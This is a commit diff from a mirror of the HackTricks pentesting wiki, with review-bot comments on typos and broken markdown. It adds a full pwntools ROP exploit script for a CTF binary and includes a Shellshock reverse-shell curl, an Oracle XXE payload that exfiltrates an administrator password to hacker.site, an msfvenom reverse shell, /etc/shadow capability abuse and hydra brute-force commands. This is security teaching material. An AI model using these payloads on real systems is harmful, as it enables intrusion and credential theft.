mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 17:07:34 +00:00
GitBook: [master] 19 pages and 4 assets modified
This commit is contained in:
parent
c59e78e9c2
commit
9d85603d35
21 changed files with 219 additions and 78 deletions
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
@ -514,7 +514,7 @@
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
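Review bot: the renamed entry `ROP - call sys\_execve` still links to `rop-syscall-execv.md`, so the slug keeps the old `execv` name while the title (and the page's new H1 further down in this commit) say `execve`. If the file is going to keep that name, fine, but renaming it to `rop-syscall-execve.md` and updating the README's `page-ref` in the same commit would keep title, heading and path consistent.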
@ -27,12 +27,6 @@ Heap**
**Stack**

## **1.STACK OVERFLOWS**

> buffer overflow, buffer overrun, stack overrun, stack smashing

Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.

**Sección BSS**: Variables globales o estáticas sin inicializar

```text
@ -51,19 +45,27 @@ int i = 5;
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)

## **1.STACK OVERFLOWS**

> buffer overflow, buffer overrun, stack overrun, stack smashing

Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.

\*\*\*\*

Para obtener la dirección de una función dentro de un programa se puede hacer:

```text
objdump -d ./PROGRAMA | grep FUNCION
```

Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:

* `unset env LINES`
* `unset env COLUMNS`
* `set env _=path` donde path es la ruta absoluta al programa
* explotar el programa usando la ruta absoluta
* asegúrate de que PWD y OLDPWD son las mismas que en gdb

## ROP

### Call to sys\_execve

{% page-ref page="rop-syscall-execv.md" %}

## **2.SHELLCODE**
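Review bot: the `\*\*\*\*` line inserted after the segmentation-fault definition is an escaped empty-bold artifact and will render as four literal asterisks; drop it. In the GDB paragraph, `hae que` should be `hace que` and `ala` should be `a la`. The same five-step GDB list is added in English to the gdb page in this commit, so this Spanish copy could simply `page-ref` that section instead of duplicating it.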
@ -1,51 +1,164 @@
# ROP - Syscall execv
# ROP - call sys\_execve

The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
In order to prepare the call for the **syscall** it's needed the following configuration:

* **RDI**: Pointing to the string "/bin/bash"
* **RSI**: Null
* **RDX**: Null
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
* `rax: 59 Specify sys_execve`
* `rdi: ptr to "/bin/sh" specify file to execute`
* `rsi: 0 specify no arguments passed`
* `rdx: 0 specify no environment variables passed`

So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).

## Control the registers

Let's start by finding **how to control those registers**:

```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```

With these addresses it's possible to **write the content in the stack and load it into the registers**.

## Write string

### Writable memory

Frist you need to find a writable place in the memory

```bash
ROPgadget --binary vulnbinary | grep syscall
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
gef> vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```

## Writing
### Write String

If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
Then you need to find a way to write arbitrary content in this address

Elsewhere, you may search for some **write-what-where**.
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`

You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`

### Finding a place to write

If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.

```bash
objdump -x vulnbinary | grep ".bss" -B1
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000010 00403418 00403418 00002418 2**3
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```

In this case: **0x403418**
#### 32 bits

### **Writing** _**"/bin/sh"**_
```python
'''
Lets write "/bin/sh" to 0x6b6000

```text
buffer += address(pop_eax) # place value into EAX
buffer += "/bin" # 4 bytes at a time
buffer += address(pop_edx) # place value into edx
buffer += address(writable_memory)
buffer += address(writewhatwhere)
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''

buffer += address(pop_eax)
buffer += "//sh"
buffer += address(pop_edx)
buffer += address(writable_memory + 4)
buffer += address(writewhatwhere)
rop += popRdx # place value into EAX
rop += "/bin" # 4 bytes at a time
rop += popRax # place value into edx
rop += p32(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```

#### 64 bits

```python
'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```

## Example

```python
from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

'''
Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
'''

rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall


# Add the padding to the saved return address
payload = "0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)

target.interactive()
```

## References

* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
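Review bot: the gadget search under "Control the registers", `grep -E "pop (rdi|rsi|rdx\rax) ; ret"`, has a backslash where the alternation needs a pipe (`rdx|rax`), so as written it does not match the `pop rax ; ret` line shown right below it, and that fence is tagged `c` for what is a shell command. The RDI bullet says `/bin/bash` while every other line on the page uses `/bin/sh`. In the write-what-where paragraph, `pop edx: ret` should be `pop edx; ret`, and `mov eax, [edx]` is a load (memory into eax), not a store, so it is not a write-what-where; the gadget the page actually uses, `mov qword ptr [rax], rdx`, is the right illustration. Under "Finding a place to write" the ```bash fence is never closed before the ```python fence opens, and that block quotes `.bss` at `0x403418` while the rest of the page writes to `0x6b6000`, which will confuse readers. The `#### 32 bits` heading sits above its parent `### **Writing** "/bin/sh"` heading, its ```python block opens a `'''` string that contains a nested ```text fence, the comments on `rop += popRdx # place value into EAX` and `rop += popRax # place value into edx` name the wrong registers, and the block pairs 4-byte `p32` writes with the 64-bit `mov qword ptr [rax], rdx` gadget. In the 64-bit blocks and the final example, `rop = ''` with `rop += p64(...)` and `"0"*0x408 + rop` mixes str and bytes and only runs on Python 2; use `b''`, `b"/bin/sh\x00"` and `b"0"*0x408` so it works with current pwntools on Python 3. Typos: `Frist` for `First`, `registries` for `registers`, `doesn't matters` for `don't matter`.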
@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
apt-get install gdb
```

### Parameters:
### Parameters

**-q** --> No show banner
**-x <file>** --> Auto-execute GDB instructions from here
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
```

### Tricks

#### GDB same addresses

While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:

* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary

#### Backtrace to find functions called

When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:

```text
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```

### GDB server

`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
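Review bot: in the backtrace paragraph, `and no to external libraries` should read `and not to external libraries`, and `the same absolute route` in the list above it should be `the same absolute path`, matching the `set env _=<path>` item. The `?? ()` frames in the sample output deserve one sentence: gdb prints `??` when it has no symbol covering the address, i.e. the binary is stripped, which is exactly why `bt` is the way to recover the call chain here. The "GDB same addresses" list should also say these settings only matter for stack addresses; code and data addresses in a non-PIE binary do not move.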
@ -744,7 +744,7 @@ And in order to read a file you could do:
print(open("/etc/shadow", "r").read())
```

#### Example with _\*\*_Environment \(Docker breakout\)
#### Example with \_\*\*\_Environment \(Docker breakout\)

You can check the enabled capabilities inside the docker container using:
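Review bot: both the old and the new heading carry an escaped empty-emphasis artifact (`_\*\*_` and `\_\*\*\_`) that renders as literal underscores and asterisks; the new line only re-escapes it one level deeper. The heading should simply read `#### Example with Environment \(Docker breakout\)`.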
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
```

Or with the **`ruby`** binary having this capability:

```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**

![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)

### Step 6: Profile Installation
@ -5,7 +5,7 @@
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.

Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).

## Main Applications
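Review bot: the replacement line breaks the link: `**\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\)` escapes the brackets and parentheses, so GitBook will render the literal text instead of a link to the CSP bypass page. Keep it as `[**Content Security Policy**](content-security-policy-csp-bypass.md)` and delete the stray empty `****` in front of it, which is what the exporter tripped over. In the context line, `can be use` should be `can be used`, and `[**XSS** ]` has a trailing space inside the link text.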
@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox=’ allow-scripts allow-to

### <meta abuse

You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`

You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`

This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
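Review bot: the removed and kept paragraphs are visually identical, so this is a whitespace-only change, but the mitigation line that follows needs correcting while this section is being touched: `http-equiv` is not a Content-Security-Policy directive, so `Content-Security-Policy: http-equiv 'self';` is an unrecognised directive that browsers ignore, and `default-src 'self'` governs subresource fetches, not the navigation a `<meta http-equiv="refresh">` triggers. Worth also noting next to the cookie example that `<meta http-equiv="Set-Cookie">` was dropped from the HTML spec and current browsers no longer honour it, so that part of the example is historical.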
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup

## Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}

## References

All the techniques presented here and more can view reviewed with more details in:

{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}

Another HTML tags that can be abused can be find here:

{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}

More info:

{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}


{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}
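Review bot: the `caption=""` attributes are the GitBook exporter's own addition and harmless, but two context sentences in this hunk need fixing: `can view reviewed with more details in` should read `can be reviewed in more detail in`, and `Another HTML tags that can be abused can be find here` should read `Other HTML tags that can be abused can be found here`.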
@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../

**Mixing several \*nix LFI lists and adding more paths I have created this one:**

{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}

Try also to change `/` for `\`
Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if

Merging several lists I have created:

{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}

Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.

## Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).

```text
http://example.com/index.php?page=../../../etc/passwd
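Review bot: the link is still mangled after this change: `[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\)` escapes the closing bracket of the link text, and the new `%29` bakes a `)` into the URL itself, so the rendered target ends in `)`. Since link text and target are identical, drop the link syntax and write it as plain text: `\(page=http://myserver.com/phpshellcode.txt\)`.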
@ -330,7 +330,7 @@ Other possible log paths:
/var/log/httpd/error_log
```

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)

### Via Email
@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

### Out of band data exfiltration via XXE

```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```
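Review bot: the new heading should name the database engine: `xmltype(...)`, `EXTRACTVALUE` and `FROM dual` make this payload Oracle-specific, whereas the `load_file(...)` example in the context line directly above is MySQL, so a reader scanning headings cannot tell which engine each technique applies to. `### Out of band data exfiltration via XXE \(Oracle\)` would make that explicit.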
@ -265,7 +265,7 @@ Entry_1:
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm


Entry_2:
Name: Hydra Brute Force
Desctiption: Need User
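Review bot: `Desctiption:` is misspelled on the visible line. These entries are consumed by key name, so a reader of the `Description` field silently skips this entry; make sure the post-change line reads `Description: Need User`, as the other entries in this commit do.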
@ -225,7 +225,7 @@ Entry_5:
Name: Browser Connection
Description: Connect with Browser
Note: ftp://anonymous:anonymous@{IP}


Entry_6:
Name: Hydra Brute Force
Description: Need Username
@ -374,10 +374,10 @@ Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -h {IP} -x -b "{Naming_Context}"


Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```
@ -111,7 +111,7 @@ Entry_4:
Name: Nmap
Description: Scan for POP info
Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}


Entry_5:
Name: Hydra Brute Force
Description: Need User
@ -499,7 +499,7 @@ Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}


Entry_5:
Name: Hydra Brute Force
Desctiption: Need User
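Review bot: same misspelling as in the WinRM entry, `Desctiption:` on the visible line; the post-change line should read `Description: Need User` so key-based parsing of these entries finds the field.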
@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`

Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:

```
```text
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
@ -507,7 +507,7 @@ Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}


Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
@ -210,7 +210,7 @@ Entry_4:
Name: Nmap
Description: Nmap snmp (no brute)
Command: nmap --script "snmp* and not snmp-brute" {IP}


Entry_5:
Name: Hydra Brute Force
Description: Need Nothing
@ -287,3 +287,4 @@ Entry_1:
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
```
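Review bot: `-u` appears twice in the hydra command (`-v -V -u -l {Username} ... -t 1 -u {IP} ssh`); one of them is redundant and should be dropped so the entry reads the same way as the other brute-force entries in this commit.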
@ -373,7 +373,7 @@ Entry_10:
Command: |
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e


Entry_11:
Name: WordPress Hydra Brute Force
Description: Need User (admin is default)
@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.

You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.

#### **Test**
### **Test**

Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
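Review bot: promoting `#### **Test**` to `###` is consistent with the `Curl` and `Exploit` headings promoted the same way further down in this commit. Two context fixes while here: `Most tests are based in echo something and expect that that string is returned` should read `Most tests are based on echoing something and expecting that string to be returned`, and `cgi\_mod` is not the Apache module's name, it is `mod_cgi` (or `mod_cgid` on threaded MPMs).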
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```

#### **Curl \(reflected, blind and out-of-band\)**
### **Curl \(reflected, blind and out-of-band\)**

```bash
# Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```

#### Exploit
### Exploit

```bash
#Bind Shell